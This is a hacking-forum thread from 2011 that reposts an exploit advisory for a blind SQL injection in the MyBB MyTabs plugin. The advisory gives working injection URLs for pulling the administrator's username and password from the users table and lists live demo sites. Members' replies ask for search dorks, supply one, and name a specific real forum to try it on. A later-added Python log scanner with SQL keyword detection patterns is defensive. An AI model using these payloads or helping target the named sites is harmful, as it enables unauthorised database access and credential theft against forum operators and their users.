.:: Blackc0de Forum ::.
 MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability

zer03s (Administrator)
Subject: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability
Posted: Wed Aug 03, 2011 1:10 am

This is an exploit I came across earlier, and it's still fresh.
Be careful, MyBB forum users, there's an exploit out for it. Luckily this forum doesn't use MyBB, it uses phpBB, so it's safe. Check it out....

Quote :
=====================================================================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
=====================================================================

# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid ^_^ !

Vulnerability :

$~ http://localhost/mybbpath/index.php?tab=[SQLi]

---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------

$~ Get the administrator's username (usually it has uid=1) ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

$~ Get the administrator's password ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -


---------------------------------------
# ~ Demos ~ #
---------------------------------------

http://secworm.net/forums/index.php?tab=1' (secworm - Ethical Hacking & IT security forum - ROFL !)
http://icanhazcookie.net/index.php?tab=1'


# Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , R-t33n , Ace Wizard, KubaNnez1 , ssgodfather, DJDukli , b4ti , CroSs HackForums.AL members & All our friends.



# 2011
http://zer03s.blog.com/
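
A defender-side check for the request pattern the advisory above describes (a non-numeric `tab` value sent to index.php), as an added example that is not part of the original post or of the MyTabs plugin. The log format, sample lines and function names are constructed for illustration, and it assumes legitimate `tab` values are plain integers.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (combined log format); IPs and paths are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [03/Aug/2011:01:10:00 +0000] "GET /forum/index.php?tab=2 HTTP/1.1" 200 5120
192.0.2.44 - - [03/Aug/2011:01:12:31 +0000] "GET /forum/index.php?tab=1%27 HTTP/1.1" 200 312
192.0.2.44 - - [03/Aug/2011:01:12:40 +0000] "GET /forum/index.php?tab=1%27%20and(select%201%20from%20information_schema.tables)--%20- HTTP/1.1" 200 298
192.0.2.51 - - [03/Aug/2011:01:15:02 +0000] "GET /forum/index.php?tab=1%2527 HTTP/1.1" 200 5120
192.0.2.10 - - [03/Aug/2011:01:16:09 +0000] "GET /forum/showthread.php?tid=7 HTTP/1.1" 200 9001
"""

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_HINTS = re.compile(r"information_schema|\bselect\b|\bconcat\b|floor\(rand", re.I)


def full_decode(value, rounds=3):
    """Undo nested percent-encoding, e.g. %2527 -> %27 -> '."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_tab_requests(log_text):
    """Return (client_ip, decoded_tab, reason) for index.php hits whose tab is not an integer."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST.match(line)
        if not match:
            continue
        client_ip, target = match.groups()
        url = urlsplit(target)
        if not url.path.endswith("/index.php"):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("tab", []):
            tab = full_decode(raw)
            if tab.isascii() and tab.isdigit():
                continue  # assumption: legitimate tab values are plain integers
            reason = "sql-keywords" if SQL_HINTS.search(tab) else "non-integer"
            findings.append((client_ip, tab, reason))
    return findings


if __name__ == "__main__":
    for finding in suspicious_tab_requests(SAMPLE_LOG):
        print(finding)
```

This only shows who probed the parameter; the durable fix is in the plugin, which under the same integer assumption should reject or cast `tab` before it reaches a query.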

Banditcode (Top Nubie)
Subject: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability
Posted: Fri Aug 12, 2011 2:33 am

Many are still affected by this. Be careful if your forum uses MyBB.

iroel (Top Nubie)
Subject: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability
Posted: Fri Aug 12, 2011 3:51 am

I don't know the dork, sir...

nesta (VIP Member)
Subject: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability
Posted: Fri Aug 12, 2011 4:09 am

If it can't be done, that means it doesn't work, right?
I want to try testing this one -> http://forum.nuruljadid.com/index.php
http://www.hacker-newbie.org

zer03s (Administrator)
Subject: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability
Posted: Thu Aug 18, 2011 6:26 pm

nesta wrote:
If it can't be done, that means it doesn't work, right?
I want to try testing this one -> http://forum.nuruljadid.com/index.php

Too bad the dork wasn't given, only an example of the vulnerability was shown. I don't know whether anyone has tried it, though; I personally haven't tried it yet, I'm stuck finding the dork.
http://zer03s.blog.com/

nesta (VIP Member)
Subject: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability
Posted: Thu Aug 18, 2011 6:46 pm

zer03s!!! wrote:
nesta wrote:
If it can't be done, that means it doesn't work, right?
I want to try testing this one -> http://forum.nuruljadid.com/index.php

Too bad the dork wasn't given, only an example of the vulnerability was shown. I don't know whether anyone has tried it, though; I personally haven't tried it yet, I'm stuck finding the dork.

Oh, I see. If you find out the dork, please share it here. I want to test that forum.
http://www.hacker-newbie.org

CyberWild (Moderator)
Subject: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability
Posted: Thu Aug 18, 2011 6:49 pm

zer03s!!! wrote:
This is an exploit I came across earlier, and it's still fresh.
Be careful, MyBB forum users, there's an exploit out for it. Luckily this forum doesn't use MyBB, it uses phpBB, so it's safe. Check it out....

Going to give it a try.
http://cyberwild.p.ht/

kenahack (NuuBiiTooL)
Subject: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability
Posted: Sat Oct 15, 2011 9:40 am

dork : "Powered by myBB" site:.my
target : index.php?tab=1

Trying it out... but I don't understand how to do the injection :D

green.day (NuuBiiTooL)
Subject: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability
Posted: Mon Feb 27, 2012 9:51 pm

Heading over to check it out, hope it works, hehe.